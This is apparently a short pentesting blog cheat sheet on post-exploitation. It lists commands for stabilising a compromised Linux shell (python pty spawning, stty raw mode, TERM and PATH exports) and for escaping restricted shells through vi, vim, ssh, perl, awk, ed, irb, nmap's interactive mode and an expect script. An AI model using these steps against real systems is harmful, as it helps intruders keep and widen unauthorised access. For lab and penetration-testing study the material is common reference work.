Post

Stable Shell: Post Exploitation

Posted
By greekbust
2 min read

These steps help in stabilising a shell by providing a more interactive environment, escaping restricted shells, and ensuring access to necessary binaries and terminal features.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88

# Use Python to spawn a pseudo-terminal for a more interactive shell experience.
python -c 'import pty; pty.spawn("/bin/bash")'
OR
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Set the PATH variable to ensure all common binaries are accessible.
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp

# Set the terminal type to support advanced features like color and better formatting.
export TERM=xterm-256color

# Create an alias for 'ls' to display files with detailed information and color coding.
alias ll='ls -lsaht --color=auto'


stty raw -echo;fg;reset

# Use Ctrl + Z to background the current process.
Keyboard Shortcut: Ctrl + Z (Background Process.)

# Configure the terminal to raw mode, bring the process to the foreground, and reset the terminal.
stty raw -echo ; fg ; reset

# Set terminal dimensions for better display of output.
stty columns 200 rows 200

# (in some cases export TERM-linux)

# Use Ctrl + Z to background the current process.
Keyboard Shortcut: Ctrl + Z (Background Process.)



# Check if the shell is restricted and attempt to escape using vi or vim.
# For vi:
$ vi
:set shell=/bin/sh
:shell

# For vim:
$ vim
:set shell=/bin/sh
:shell

# Another method to escape restricted bash using SSH.
ssh [email protected] "/bin/sh"
rm $HOME/.bashrc
exit
ssh [email protected]

# Check if Python is available to spawn a shell.
python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/sh")'

# Check if Perl is available to execute a shell.
perl -e 'exec "/bin/bash";'
perl -e 'exec "/bin/sh";'

# Check if AWK is available to execute a shell.
awk 'BEGIN {system("/bin/bash -i")}'
awk 'BEGIN {system("/bin/sh -i")}'

# Check if ed is available to execute a shell.
ed
!sh

# Check if IRB is available to execute a shell.
exec "/bin/sh"

# Check if Nmap is available to execute a shell.
nmap --interactive
nmap> !sh

# Use Expect to automate interaction with the shell.
expect -v
  expect version 5.45.4
  
# Create an Expect script to spawn a bash shell and interact with it.
$ cat > /tmp/shell.sh <<EOF
#!/usr/bin/expect
spawn bash
interact
EOF

# Make the script executable and run it.
$ chmod u+x /tmp/shell.sh
$ /tmp/shell.sh
Command Cheatsheet
cheatsheet
This post is licensed under CC BY 4.0 by the author.